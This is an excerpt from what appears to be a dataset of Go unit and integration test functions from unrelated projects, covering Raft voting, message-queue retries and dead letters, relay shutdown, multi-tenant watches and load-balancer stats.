changesResults.Results, 1)\n\tassert.Equal(t, docID, changesResults.Results[0].ID)\n\n\tassert.Equal(t, int64(0), ar.Push.Checkpointer.Stats().SetCheckpointCount)\n\tar.Push.Checkpointer.CheckpointNow()\n\tassert.Equal(t, int64(1), ar.Push.Checkpointer.Stats().SetCheckpointCount)\n\n\tassert.Equal(t, int64(0), ar.Pull.Checkpointer.Stats().SetCheckpointCount)\n\tar.Pull.Checkpointer.CheckpointNow()\n\tassert.Equal(t, int64(1), ar.Pull.Checkpointer.Stats().SetCheckpointCount)\n\n\tassert.NoError(t, ar.Stop())\n}", "func TestRelayRejectsDuringClose(t *testing.T) {\n\topts := testutils.NewOpts().\n\t\tSetRelayOnly().\n\t\tSetCheckFramePooling().\n\t\tAddLogFilter(\"Failed to relay frame.\", 1, \"error\", \"incoming connection is not active: connectionStartClose\")\n\ttestutils.WithTestServer(t, opts, func(t testing.TB, ts *testutils.TestServer) {\n\t\tgotCall := make(chan struct{})\n\t\tblock := make(chan struct{})\n\n\t\ttestutils.RegisterEcho(ts.Server(), func() {\n\t\t\tclose(gotCall)\n\t\t\t<-block\n\t\t})\n\n\t\tclient := ts.NewClient(nil)\n\t\tvar wg sync.WaitGroup\n\t\twg.Add(1)\n\t\tgo func() {\n\t\t\tdefer wg.Done()\n\t\t\ttestutils.AssertEcho(t, client, ts.HostPort(), ts.ServiceName())\n\t\t}()\n\n\t\t<-gotCall\n\t\t// Close the relay so that it stops accepting more calls.\n\t\tts.Relay().Close()\n\t\terr := testutils.CallEcho(client, ts.HostPort(), ts.ServiceName(), nil)\n\t\trequire.Error(t, err, \"Expect call to fail after relay is shutdown\")\n\t\tassert.Contains(t, err.Error(), \"incoming connection is not active\")\n\t\tclose(block)\n\t\twg.Wait()\n\n\t\t// We have a successful call that ran in the goroutine\n\t\t// and a failed call that we just checked the error on.\n\t\tcalls := relaytest.NewMockStats()\n\t\tcalls.Add(client.PeerInfo().ServiceName, ts.ServiceName(), \"echo\").\n\t\t\tSucceeded().End()\n\t\tcalls.Add(client.PeerInfo().ServiceName, ts.ServiceName(), \"echo\").\n\t\t\t// No peer is set since we rejected the call before selecting one.\n\t\t\tFailed(\"relay-client-conn-inactive\").End()\n\t\tts.AssertRelayStats(calls)\n\t})\n}", "func (s *ServerSuite) TestSrvRTMOnDelete(c *C) {\n\te1 := testutils.NewResponder(\"Hi, I'm endpoint 1\")\n\tdefer e1.Close()\n\n\tb := MakeBatch(Batch{Addr: \"localhost:11300\", Route: `Path(\"/\")`, URL: e1.URL})\n\tc.Assert(s.mux.Init(b.Snapshot()), IsNil)\n\tc.Assert(s.mux.Start(), IsNil)\n\tdefer s.mux.Stop(true)\n\n\t// When: an existing backend server is removed and added again.\n\tfor i := 0; i < 3; i++ {\n\t\tc.Assert(GETResponse(c, b.FrontendURL(\"/\")), Equals, \"Hi, I'm endpoint 1\")\n\t}\n\tc.Assert(s.mux.DeleteServer(b.SK), IsNil)\n\tc.Assert(s.mux.UpsertServer(b.BK, b.S), IsNil)\n\tfor i := 0; i < 4; i++ {\n\t\tc.Assert(GETResponse(c, b.FrontendURL(\"/\")), Equals, \"Hi, I'm endpoint 1\")\n\t}\n\n\t// Then: total count includes only metrics after the server was re-added.\n\trts, err := s.mux.ServerStats(b.SK)\n\tc.Assert(err, IsNil)\n\tc.Assert(rts.Counters.Total, Equals, int64(4))\n}", "func TestServer_ServeCanRetryMessages(t *testing.T) {\n\tmessages := []*msg.Message{\n\t\t{\n\t\t\tAttributes: msg.Attributes{},\n\t\t\tBody: bytes.NewBufferString(\"message #1: hello world!\"),\n\t\t},\n\t}\n\n\tsrv := mem.NewServer(make(chan *msg.Message, len(messages)), 1)\n\n\tfor _, m := range messages {\n\t\tsrv.C <- m\n\t}\n\tdefer close(srv.C)\n\n\toutputChannel := make(chan struct{})\n\tgo func() {\n\t\tsrv.Serve(&RetryReceiver{\n\t\t\tt: t,\n\t\t\tC: outputChannel,\n\n\t\t\tcalls: 0,\n\t\t\tallowedRetries: 10,\n\t\t})\n\t}()\n\n\t// after 10th retry receiver will write to channel\n\tctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)\n\tdefer cancel()\n\n\tselect {\n\tcase <-ctx.Done():\n\t\tt.Fatalf(\"context timed out\")\n\tcase <-outputChannel:\n\t\tclose(outputChannel)\n\t}\n}", "func SNSSQSMessageVisibilityTimeout(t *testing.T) {\n\tconsumerGroup1 := watcher.NewUnordered()\n\tmetadata := map[string]string{}\n\tlatch := make(chan struct{})\n\tbusyTime := 10 * time.Second\n\tmessagesToSend := 1\n\twaitForLatch := func(appID string, ctx flow.Context, l chan struct{}) error {\n\t\tctx.Logf(\"waitForLatch %s is waiting...\\n\", appID)\n\t\t<-l\n\t\tctx.Logf(\"waitForLatch %s ready to continue!\\n\", appID)\n\t\treturn nil\n\t}\n\n\tsubscriberMVTimeoutApp := func(appID string, topicName string, messagesWatcher *watcher.Watcher, l chan struct{}) app.SetupFn {\n\t\treturn func(ctx flow.Context, s common.Service) error {\n\t\t\tctx.Logf(\"SNSSQSMessageVisibilityTimeout.subscriberApplicationMVTimeout App: %q topicName: %q\\n\", appID, topicName)\n\t\t\treturn multierr.Combine(\n\t\t\t\ts.AddTopicEventHandler(&common.Subscription{\n\t\t\t\t\tPubsubName: pubsubName,\n\t\t\t\t\tTopic: topicName,\n\t\t\t\t\tRoute: \"/orders\",\n\t\t\t\t}, func(_ context.Context, e *common.TopicEvent) (retry bool, err error) {\n\t\t\t\t\tctx.Logf(\"SNSSQSMessageVisibilityTimeout.subscriberApplicationMVTimeout App: %q got message: %s busy for %v\\n\", appID, e.Data, busyTime)\n\t\t\t\t\ttime.Sleep(busyTime)\n\t\t\t\t\tctx.Logf(\"SNSSQSMessageVisibilityTimeout.subscriberApplicationMVTimeout App: %q - notifying next Subscriber to continue...\\n\", appID)\n\t\t\t\t\tl <- struct{}{}\n\t\t\t\t\tctx.Logf(\"SNSSQSMessageVisibilityTimeout.subscriberApplicationMVTimeoutApp: %q - sent busy for %v\\n\", appID, busyTime)\n\t\t\t\t\ttime.Sleep(busyTime)\n\t\t\t\t\tctx.Logf(\"SNSSQSMessageVisibilityTimeout.subscriberApplicationMVTimeoutApp: %q - done!\\n\", appID)\n\t\t\t\t\treturn false, nil\n\t\t\t\t}),\n\t\t\t)\n\t\t}\n\t}\n\n\tnotExpectingMessagesSubscriberApp := func(appID string, topicName string, messagesWatcher *watcher.Watcher, l chan struct{}) app.SetupFn {\n\t\treturn func(ctx flow.Context, s common.Service) error {\n\t\t\tctx.Logf(\"SNSSQSMessageVisibilityTimeout.notExpectingMessagesSubscriberApp App: %q topicName: %q waiting for notification to start receiving messages\\n\", appID, topicName)\n\t\t\treturn multierr.Combine(\n\t\t\t\twaitForLatch(appID, ctx, l),\n\t\t\t\ts.AddTopicEventHandler(&common.Subscription{\n\t\t\t\t\tPubsubName: pubsubName,\n\t\t\t\t\tTopic: topicName,\n\t\t\t\t\tRoute: \"/orders\",\n\t\t\t\t}, func(_ context.Context, e *common.TopicEvent) (retry bool, err error) {\n\t\t\t\t\tctx.Logf(\"SNSSQSMessageVisibilityTimeout.notExpectingMessagesSubscriberApp App: %q got unexpected message: %s\\n\", appID, e.Data)\n\t\t\t\t\tmessagesWatcher.FailIfNotExpected(t, e.Data)\n\t\t\t\t\treturn false, nil\n\t\t\t\t}),\n\t\t\t)\n\t\t}\n\t}\n\n\ttestTtlPublishMessages := func(metadata map[string]string, sidecarName string, topicName string, messageWatchers ...*watcher.Watcher) flow.Runnable {\n\t\treturn func(ctx flow.Context) error {\n\t\t\t// prepare the messages\n\t\t\tmessages := make([]string, messagesToSend)\n\t\t\tfor i := range messages {\n\t\t\t\tmessages[i] = fmt.Sprintf(\"partitionKey: %s, message for topic: %s, index: %03d, uniqueId: %s\", metadata[messageKey], topicName, i, uuid.New().String())\n\t\t\t}\n\n\t\t\tctx.Logf(\"####### get the sidecar (dapr) client sidecarName: %s, topicName: %s\", sidecarName, topicName)\n\t\t\t// get the sidecar (dapr) client\n\t\t\tclient := sidecar.GetClient(ctx, sidecarName)\n\n\t\t\t// publish messages\n\t\t\tctx.Logf(\"####### Publishing messages. sidecarName: %s, topicName: %s\", sidecarName, topicName)\n\n\t\t\tvar publishOptions dapr.PublishEventOption\n\n\t\t\tif metadata != nil {\n\t\t\t\tpublishOptions = dapr.PublishEventWithMetadata(metadata)\n\t\t\t}\n\n\t\t\tfor _, message := range messages {\n\t\t\t\tctx.Logf(\"Publishing: %q\", message)\n\t\t\t\tvar err error\n\n\t\t\t\tif publishOptions != nil {\n\t\t\t\t\terr = client.PublishEvent(ctx, pubsubName, topicName, message, publishOptions)\n\t\t\t\t} else {\n\t\t\t\t\terr = client.PublishEvent(ctx, pubsubName, topicName, message)\n\t\t\t\t}\n\t\t\t\trequire.NoError(ctx, err, \"SNSSQSMessageVisibilityTimeout - error publishing message\")\n\t\t\t}\n\t\t\treturn nil\n\t\t}\n\t}\n\n\tconnectToSideCar := func(sidecarName string) flow.Runnable {\n\t\treturn func(ctx flow.Context) error {\n\t\t\tctx.Logf(\"####### connect to sidecar (dapr) client sidecarName: %s and exit\", sidecarName)\n\t\t\t// get the sidecar (dapr) client\n\t\t\tsidecar.GetClient(ctx, sidecarName)\n\t\t\treturn nil\n\t\t}\n\t}\n\n\tflow.New(t, \"SNSSQS certification - messageVisibilityTimeout attribute receive\").\n\t\t// App1 should receive the messages, wait some time (busy), notify App2, wait some time (busy),\n\t\t// and finish processing message.\n\t\tStep(app.Run(appID1, fmt.Sprintf(\":%d\", appPort+portOffset),\n\t\t\tsubscriberMVTimeoutApp(appID1, messageVisibilityTimeoutTopic, consumerGroup1, latch))).\n\t\tStep(sidecar.Run(sidecarName1,\n\t\t\tappend(componentRuntimeOptions(),\n\t\t\t\tembedded.WithComponentsPath(\"./components/message_visibility_timeout\"),\n\t\t\t\tembedded.WithAppProtocol(protocol.HTTPProtocol, strconv.Itoa(appPort+portOffset)),\n\t\t\t\tembedded.WithDaprGRPCPort(strconv.Itoa(runtime.DefaultDaprAPIGRPCPort+portOffset)),\n\t\t\t\tembedded.WithDaprHTTPPort(strconv.Itoa(runtime.DefaultDaprHTTPPort+portOffset)),\n\t\t\t\tembedded.WithProfilePort(strconv.Itoa(runtime.DefaultProfilePort+portOffset)),\n\t\t\t)...,\n\t\t)).\n\t\tStep(fmt.Sprintf(\"publish messages to messageVisibilityTimeoutTopic: %s\", messageVisibilityTimeoutTopic),\n\t\t\ttestTtlPublishMessages(metadata, sidecarName1, messageVisibilityTimeoutTopic, consumerGroup1)).\n\n\t\t// App2 waits for App1 notification to subscribe to message\n\t\t// After subscribing, if App2 receives any messages, the messageVisibilityTimeoutTopic is either too short,\n\t\t// or code is broken somehow\n\t\tStep(app.Run(appID2, fmt.Sprintf(\":%d\", appPort+portOffset+2),\n\t\t\tnotExpectingMessagesSubscriberApp(appID2, messageVisibilityTimeoutTopic, consumerGroup1, latch))).\n\t\tStep(sidecar.Run(sidecarName2,\n\t\t\tappend(componentRuntimeOptions(),\n\t\t\t\tembedded.WithComponentsPath(\"./components/message_visibility_timeout\"),\n\t\t\t\tembedded.WithAppProtocol(protocol.HTTPProtocol, strconv.Itoa(appPort+portOffset+2)),\n\t\t\t\tembedded.WithDaprGRPCPort(strconv.Itoa(runtime.DefaultDaprAPIGRPCPort+portOffset+2)),\n\t\t\t\tembedded.WithDaprHTTPPort(strconv.Itoa(runtime.DefaultDaprHTTPPort+portOffset+2)),\n\t\t\t\tembedded.WithProfilePort(strconv.Itoa(runtime.DefaultProfilePort+portOffset+2)),\n\t\t\t)...,\n\t\t)).\n\t\tStep(\"No messages will be sent here\",\n\t\t\tconnectToSideCar(sidecarName2)).\n\t\tStep(\"wait\", flow.Sleep(10*time.Second)).\n\t\tRun()\n\n}", "func TestUnsubscribeNotSubscribed(t *testing.T) {\n\tassert := assert.New(t)\n\tpubnubInstance := messaging.NewPubnub(PubKey, SubKey, \"\", \"\", false, \"\")\n\n\tcurrentTime := time.Now()\n\tchannel := \"testChannel\" + currentTime.Format(\"20060102150405\")\n\n\tsuccessChannel := make(chan []byte)\n\terrorChannel := make(chan []byte)\n\n\tgo pubnubInstance.Unsubscribe(channel, successChannel, errorChannel)\n\tselect {\n\tcase <-successChannel:\n\t\tassert.Fail(\"Success unsubscribe response while expecting an error\")\n\tcase err := <-errorChannel:\n\t\tassert.Contains(string(err), \"not subscribed\")\n\t\tassert.Contains(string(err), channel)\n\tcase <-timeout():\n\t\tassert.Fail(\"Unsubscribe request timeout\")\n\t}\n}", "func TestPartitionRightUnbounded(t *testing.T) {\n\t_, closeFn, clientset, configFilename := setUpSingleApiserver(t, tenant2, \"\", \"0\")\n\tdefer deleteSinglePartitionConfigFile(t, configFilename)\n\tdefer closeFn()\n\n\t// create informer 1 from server 1\n\tresyncPeriod := 12 * time.Hour\n\tinformer := informers.NewSharedInformerFactory(clientset, resyncPeriod)\n\tstopCh := make(chan struct{})\n\tinformer.Start(stopCh)\n\tdefer close(stopCh)\n\n\tstartEventBroadCaster(t, clientset)\n\tinformer.WaitForCacheSync(stopCh)\n\tgo informer.Apps().V1().ReplicaSets().Informer().Run(stopCh)\n\n\tnamespace := \"ns1\"\n\trsClient := clientset.AppsV1().ReplicaSetsWithMultiTenancy(namespace, tenant2)\n\tw := rsClient.Watch(metav1.ListOptions{})\n\tdefer w.Stop()\n\tassert.Nil(t, w.GetErrors())\n\n\trs := createRS(t, clientset, tenant2, namespace, \"rs2\", 1)\n\tassert.NotNil(t, rs)\n\tdeleteRS(t, clientset, rs)\n\n\totherRs := createRS(t, clientset, tenant1, namespace, \"rs1\", 1)\n\tassert.NotNil(t, otherRs)\n\tassert.NotEqual(t, rs.UID, otherRs.UID)\n\tdeleteRS(t, clientset, otherRs)\n\n\tpod := createPod(t, clientset, tenant2, namespace, \"pod\")\n\tassert.NotNil(t, pod)\n\tdeletePod(t, clientset, pod)\n\n\t// check data from different api servers\n\trsFound := false\n\tfor {\n\t\tselect {\n\t\tcase event, ok := <-w.ResultChan():\n\t\t\tif !ok {\n\t\t\t\tt.Fatalf(\"Failed to get replicaset from watch api server\")\n\t\t\t}\n\t\t\tif event.Type == watch.Error {\n\t\t\t\tt.Fatalf(\"Result channel get error event. %v\", event)\n\t\t\t}\n\t\t\tmeta, err := meta.Accessor(event.Object)\n\t\t\tif err != nil {\n\t\t\t\tt.Fatalf(\"Unable to understand watch event %#v\", event)\n\t\t\t}\n\n\t\t\tif rs.UID == meta.GetUID() {\n\t\t\t\trsFound = true\n\t\t\t\tassert.Equal(t, rs.UID, meta.GetUID())\n\t\t\t\tassert.Equal(t, rs.HashKey, meta.GetHashKey())\n\t\t\t\tassert.Equal(t, rs.Name, meta.GetName())\n\t\t\t\tassert.Equal(t, rs.Namespace, meta.GetNamespace())\n\t\t\t\tassert.Equal(t, rs.Tenant, meta.GetTenant())\n\t\t\t}\n\t\t\tif otherRs.UID == meta.GetUID() {\n\t\t\t\tt.Fatalf(\"The api server should not sync other replicaset data\")\n\t\t\t}\n\t\t\tif pod.UID == meta.GetUID() {\n\t\t\t\tt.Fatalf(\"The api server should not sync other pods data\")\n\t\t\t}\n\t\tcase <-time.After(10 * time.Second):\n\t\t\tt.Fatalf(\"unable to get replicaset from watch api server\")\n\t\t}\n\n\t\tif rsFound {\n\t\t\tbreak\n\t\t}\n\t}\n\tassert.True(t, rsFound)\n}", "func TestFollowerVote(t *testing.T) {\n\ttests := []struct {\n\t\tvote uint64\n\t\tnvote uint64\n\t\twreject bool\n\t}{\n\t\t{None, 1, false},\n\t\t{None, 2, false},\n\t\t{1, 1, false},\n\t\t{2, 2, false},\n\t\t{1, 2, true},\n\t\t{2, 1, true},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.loadState(pb.HardState{Term: 1, Vote: tt.vote})\n\n\t\tr.Step(pb.Message{From: tt.nvote, FromGroup: pb.Group{NodeId: tt.nvote, GroupId: 1, RaftReplicaId: tt.nvote},\n\t\t\tTo: 1, ToGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTerm: 1, Type: pb.MsgVote})\n\n\t\tmsgs := r.readMessages()\n\t\twmsgs := []pb.Message{\n\t\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\t\tTo: tt.nvote, ToGroup: pb.Group{NodeId: tt.nvote, GroupId: 1, RaftReplicaId: tt.nvote},\n\t\t\t\tTerm: 1, Type: pb.MsgVoteResp, Reject: tt.wreject},\n\t\t}\n\t\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\t\tt.Errorf(\"#%d: msgs = %v, want %v\", i, msgs, wmsgs)\n\t\t}\n\t}\n}", "func TestClient_Unsubscribe(t *testing.T) {\n\tc := OpenClient(0)\n\tdefer c.Close()\n\tc.Server.Broker().CreateReplica(100, &url.URL{Host: \"localhost\"})\n\tc.Server.Broker().Subscribe(100, 200)\n\n\t// Remove subscription through client.\n\tif err := c.Unsubscribe(100, 200); err != nil {\n\t\tt.Fatalf(\"unexpected error: %v\", err)\n\t}\n\n\t// Verify subscription was removed.\n\tif a := c.Server.Handler.Broker().Replica(100).Topics(); !reflect.DeepEqual([]uint64{0}, a) {\n\t\tt.Fatalf(\"topics mismatch: %v\", a)\n\t}\n}", "func TestRecvMsgBeat(t *testing.T) {\n\ttests := []struct {\n\t\tstate StateType\n\t\twMsg int\n\t}{\n\t\t{StateLeader, 2},\n\t\t// candidate and follower should ignore MsgBeat\n\t\t{StateCandidate, 0},\n\t\t{StateFollower, 0},\n\t}\n\n\tfor i, tt := range tests {\n\t\tsm := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\t\tsm.raftLog = &raftLog{storage: newInitedMemoryStorage([]pb.Entry{{}, {Index: 1, Term: 0}, {Index: 2, Term: 1}})}\n\t\tdefer closeAndFreeRaft(sm)\n\t\tsm.Term = 1\n\t\tsm.state = tt.state\n\t\tswitch tt.state {\n\t\tcase StateFollower:\n\t\t\tsm.step = stepFollower\n\t\tcase StateCandidate:\n\t\t\tsm.step = stepCandidate\n\t\tcase StateLeader:\n\t\t\tsm.step = stepLeader\n\t\t}\n\t\tsm.Step(pb.Message{From: 1, To: 1, Type: pb.MsgBeat})\n\n\t\tmsgs := sm.readMessages()\n\t\tif len(msgs) != tt.wMsg {\n\t\t\tt.Errorf(\"%d: len(msgs) = %d, want %d\", i, len(msgs), tt.wMsg)\n\t\t}\n\t\tfor _, m := range msgs {\n\t\t\tif m.Type != pb.MsgHeartbeat {\n\t\t\t\tt.Errorf(\"%d: msg.type = %v, want %v\", i, m.Type, pb.MsgHeartbeat)\n\t\t\t}\n\t\t}\n\t}\n}", "func TestProposalBufferRejectLeaseAcqOnFollower(t *testing.T) {\n\tdefer leaktest.AfterTest(t)()\n\tdefer log.Scope(t).Close(t)\n\tctx := context.Background()\n\n\tself := uint64(1)\n\t// Each subtest will try to propose a lease acquisition in a different Raft\n\t// scenario. Some proposals should be allowed, some should be rejected.\n\tfor _, tc := range []struct {\n\t\tname string\n\t\tstate raft.StateType\n\t\t// raft.None means there's no leader, or the leader is unknown.\n\t\tleader uint64\n\t\t// Empty means VOTER_FULL.\n\t\tleaderRepType roachpb.ReplicaType\n\t\t// Set to simulate situations where the local replica is so behind that the\n\t\t// leader is not even part of the range descriptor.\n\t\tleaderNotInRngDesc bool\n\t\t// If true, the follower has a valid lease.\n\t\townsValidLease bool\n\n\t\texpRejection bool\n\t}{\n\t\t{\n\t\t\tname: \"leader\",\n\t\t\tstate: raft.StateLeader,\n\t\t\tleader: self,\n\t\t\t// No rejection. The leader can request a lease.\n\t\t\texpRejection: false,\n\t\t},\n\t\t{\n\t\t\tname: \"follower, known eligible leader\",\n\t\t\tstate: raft.StateFollower,\n\t\t\t// Someone else is leader.\n\t\t\tleader: self + 1,\n\t\t\t// Rejection - a follower can't request a lease.\n\t\t\texpRejection: true,\n\t\t},\n\t\t{\n\t\t\tname: \"follower, lease extension despite known eligible leader\",\n\t\t\tstate: raft.StateFollower,\n\t\t\t// Someone else is leader, but we're the leaseholder.\n\t\t\tleader: self + 1,\n\t\t\townsValidLease: true,\n\t\t\t// No rejection of lease extensions.\n\t\t\texpRejection: false,\n\t\t},\n\t\t{\n\t\t\tname: \"follower, known ineligible leader\",\n\t\t\tstate: raft.StateFollower,\n\t\t\t// Someone else is leader.\n\t\t\tleader: self + 1,\n\t\t\t// The leader type makes it ineligible to get the lease. Thus, the local\n\t\t\t// proposal will not be rejected.\n\t\t\tleaderRepType: roachpb.VOTER_DEMOTING_LEARNER,\n\t\t\texpRejection: false,\n\t\t},\n\t\t{\n\t\t\t// Here we simulate the leader being known by Raft, but the local replica\n\t\t\t// is so far behind that it doesn't contain the leader replica.\n\t\t\tname: \"follower, known leader not in range descriptor\",\n\t\t\tstate: raft.StateFollower,\n\t\t\t// Someone else is leader.\n\t\t\tleader: self + 1,\n\t\t\tleaderNotInRngDesc: true,\n\t\t\t// We assume that the leader is eligible, and redirect.\n\t\t\texpRejection: true,\n\t\t},\n\t\t{\n\t\t\tname: \"follower, unknown leader\",\n\t\t\tstate: raft.StateFollower,\n\t\t\t// Unknown leader.\n\t\t\tleader: raft.None,\n\t\t\t// No rejection if the leader is unknown. See comments in\n\t\t\t// FlushLockedWithRaftGroup().\n\t\t\texpRejection: false,\n\t\t},\n\t} {\n\t\tt.Run(tc.name, func(t *testing.T) {\n\t\t\tvar p testProposer\n\t\t\tvar pc proposalCreator\n\t\t\t// p.replicaID() is hardcoded; it'd better be hardcoded to what this test\n\t\t\t// expects.\n\t\t\trequire.Equal(t, self, uint64(p.replicaID()))\n\n\t\t\tvar rejected roachpb.ReplicaID\n\t\t\tif tc.expRejection {\n\t\t\t\tp.onRejectProposalWithRedirectLocked = func(_ *ProposalData, redirectTo roachpb.ReplicaID) {\n\t\t\t\t\tif rejected != 0 {\n\t\t\t\t\t\tt.Fatalf(\"unexpected 2nd rejection\")\n\t\t\t\t\t}\n\t\t\t\t\trejected = redirectTo\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tp.onRejectProposalWithRedirectLocked = func(_ *ProposalData, _ roachpb.ReplicaID) {\n\t\t\t\t\tt.Fatalf(\"unexpected redirection\")\n\t\t\t\t}\n\t\t\t}\n\n\t\t\traftStatus := raft.BasicStatus{\n\t\t\t\tID: self,\n\t\t\t\tSoftState: raft.SoftState{\n\t\t\t\t\tRaftState: tc.state,\n\t\t\t\t\tLead: tc.leader,\n\t\t\t\t},\n\t\t\t}\n\t\t\tr := &testProposerRaft{\n\t\t\t\tstatus: raftStatus,\n\t\t\t}\n\t\t\tp.raftGroup = r\n\t\t\tp.leaderReplicaInDescriptor = !tc.leaderNotInRngDesc\n\t\t\tp.leaderReplicaType = tc.leaderRepType\n\t\t\tp.ownsValidLease = tc.ownsValidLease\n\n\t\t\tvar b propBuf\n\t\t\tclock := hlc.NewClock(hlc.UnixNano, time.Nanosecond)\n\t\t\ttracker := tracker.NewLockfreeTracker()\n\t\t\tb.Init(&p, tracker, clock, cluster.MakeTestingClusterSettings())\n\n\t\t\tpd, data := pc.newLeaseProposal(roachpb.Lease{})\n\t\t\t_, tok := b.TrackEvaluatingRequest(ctx, hlc.MinTimestamp)\n\t\t\t_, err := b.Insert(ctx, pd, data, tok.Move(ctx))\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.NoError(t, b.flushLocked(ctx))\n\t\t\tif tc.expRejection {\n\t\t\t\trequire.Equal(t, roachpb.ReplicaID(tc.leader), rejected)\n\t\t\t} else {\n\t\t\t\trequire.Equal(t, roachpb.ReplicaID(0), rejected)\n\t\t\t}\n\t\t\trequire.Zero(t, tracker.Count())\n\t\t})\n\t}\n}", "func SNSSQSMessageDeadLetter(t *testing.T) {\n\tconsumerGroup1 := watcher.NewUnordered()\n\tdeadLetterConsumerGroup := watcher.NewUnordered()\n\tfailedMessagesNum := 1\n\n\tsubscriberApplication := func(appID string, topicName string, messagesWatcher *watcher.Watcher) app.SetupFn {\n\t\treturn func(ctx flow.Context, s common.Service) error {\n\t\t\treturn multierr.Combine(\n\t\t\t\ts.AddTopicEventHandler(&common.Subscription{\n\t\t\t\t\tPubsubName: pubsubName,\n\t\t\t\t\tTopic: topicName,\n\t\t\t\t\tRoute: \"/orders\",\n\t\t\t\t}, func(_ context.Context, e *common.TopicEvent) (retry bool, err error) {\n\t\t\t\t\tctx.Logf(\"subscriberApplication - Message Received appID: %s,pubsub: %s, topic: %s, id: %s, data: %s - causing failure on purpose...\", appID, e.PubsubName, e.Topic, e.ID, e.Data)\n\t\t\t\t\treturn true, fmt.Errorf(\"failure on purpose\")\n\t\t\t\t}),\n\t\t\t)\n\t\t}\n\t}\n\n\tvar task flow.AsyncTask\n\tdeadLetterReceiverApplication := func(deadLetterQueueName string, msgTimeout time.Duration, messagesWatcher *watcher.Watcher) flow.Runnable {\n\t\treturn func(ctx flow.Context) error {\n\t\t\tt := time.NewTicker(500 * time.Millisecond)\n\t\t\tdefer t.Stop()\n\t\t\tcounter := 1\n\t\t\tqm := NewQueueManager()\n\n\t\t\tfor {\n\t\t\t\tselect {\n\t\t\t\tcase <-task.Done():\n\t\t\t\t\tctx.Log(\"deadLetterReceiverApplication - task done called!\")\n\t\t\t\t\treturn nil\n\t\t\t\tcase <-time.After(msgTimeout * time.Second):\n\t\t\t\t\tctx.Logf(\"deadLetterReceiverApplication - timeout waiting for messages from (%q)\", deadLetterQueueName)\n\t\t\t\t\treturn fmt.Errorf(\"deadLetterReceiverApplication - timeout waiting for messages from (%q)\", deadLetterQueueName)\n\t\t\t\tcase <-t.C:\n\t\t\t\t\tnumMsgs, err := qm.GetMessages(deadLetterQueueName, true, func(m *DataMessage) error {\n\t\t\t\t\t\tctx.Logf(\"deadLetterReceiverApplication - received message counter(%d) (%v)\\n\", counter, m.Data)\n\t\t\t\t\t\tmessagesWatcher.Observe(m.Data)\n\t\t\t\t\t\treturn nil\n\t\t\t\t\t})\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tctx.Logf(\"deadLetterReceiverApplication - failed to get messages from (%q) counter(%d) %v - trying again\\n\", deadLetterQueueName, counter, err)\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\tif numMsgs == 0 {\n\t\t\t\t\t\t// No messages yet, try again\n\t\t\t\t\t\tctx.Logf(\"deadLetterReceiverApplication - no messages yet from (%q) counter(%d) - trying again\\n\", deadLetterQueueName, counter)\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\n\t\t\t\t\tif counter >= failedMessagesNum {\n\t\t\t\t\t\tctx.Logf(\"deadLetterReceiverApplication - received all expected (%d) failed message!\\n\", failedMessagesNum)\n\t\t\t\t\t\treturn nil\n\t\t\t\t\t}\n\t\t\t\t\tcounter += numMsgs\n\t\t\t\t}\n\n\t\t\t}\n\t\t}\n\t}\n\n\tpublishMessages := func(metadata map[string]string, sidecarName string, topicName string, messageWatchers ...*watcher.Watcher) flow.Runnable {\n\t\treturn func(ctx flow.Context) error {\n\t\t\t// prepare the messages\n\t\t\tmessages := make([]string, failedMessagesNum)\n\t\t\tfor i := range messages {\n\t\t\t\tmessages[i] = fmt.Sprintf(\"partitionKey: %s, message for topic: %s, index: %03d, uniqueId: %s\", metadata[messageKey], topicName, i, uuid.New().String())\n\t\t\t}\n\n\t\t\t// add the messages as expectations to the watchers\n\t\t\tfor _, messageWatcher := range messageWatchers {\n\t\t\t\tmessageWatcher.ExpectStrings(messages...)\n\t\t\t}\n\n\t\t\t// get the sidecar (dapr) client\n\t\t\tclient := sidecar.GetClient(ctx, sidecarName)\n\n\t\t\t// publish messages\n\t\t\tctx.Logf(\"SNSSQSMessageDeadLetter - Publishing messages. sidecarName: %s, topicName: %s\", sidecarName, topicName)\n\n\t\t\tvar publishOptions dapr.PublishEventOption\n\n\t\t\tif metadata != nil {\n\t\t\t\tpublishOptions = dapr.PublishEventWithMetadata(metadata)\n\t\t\t}\n\n\t\t\tfor _, message := range messages {\n\t\t\t\tctx.Logf(\"Publishing: %q\", message)\n\t\t\t\tvar err error\n\n\t\t\t\tif publishOptions != nil {\n\t\t\t\t\terr = client.PublishEvent(ctx, pubsubName, topicName, message, publishOptions)\n\t\t\t\t} else {\n\t\t\t\t\terr = client.PublishEvent(ctx, pubsubName, topicName, message)\n\t\t\t\t}\n\t\t\t\trequire.NoError(ctx, err, \"SNSSQSMessageDeadLetter - error publishing message\")\n\t\t\t}\n\t\t\treturn nil\n\t\t}\n\t}\n\n\tassertMessages := func(timeout time.Duration, messageWatchers ...*watcher.Watcher) flow.Runnable {\n\t\treturn func(ctx flow.Context) error {\n\t\t\t// assert for messages\n\t\t\tfor _, m := range messageWatchers {\n\t\t\t\tif !m.Assert(ctx, 3*timeout) {\n\t\t\t\t\tctx.Errorf(\"SNSSQSMessageDeadLetter - message assertion failed for watcher: %#v\\n\", m)\n\t\t\t\t}\n\t\t\t}\n\n\t\t\treturn nil\n\t\t}\n\t}\n\n\tprefix := \"SNSSQSMessageDeadLetter-\"\n\tdeadletterApp := prefix + \"deadLetterReceiverApp\"\n\tsubApp := prefix + \"subscriberApp\"\n\tsubAppSideCar := prefix + sidecarName2\n\tmsgTimeout := time.Duration(60) //seconds\n\n\tflow.New(t, \"SNSSQSMessageDeadLetter Verify with single publisher / single subscriber and DeadLetter\").\n\n\t\t// Run deadLetterReceiverApplication - should receive messages from dead letter queue\n\t\t// 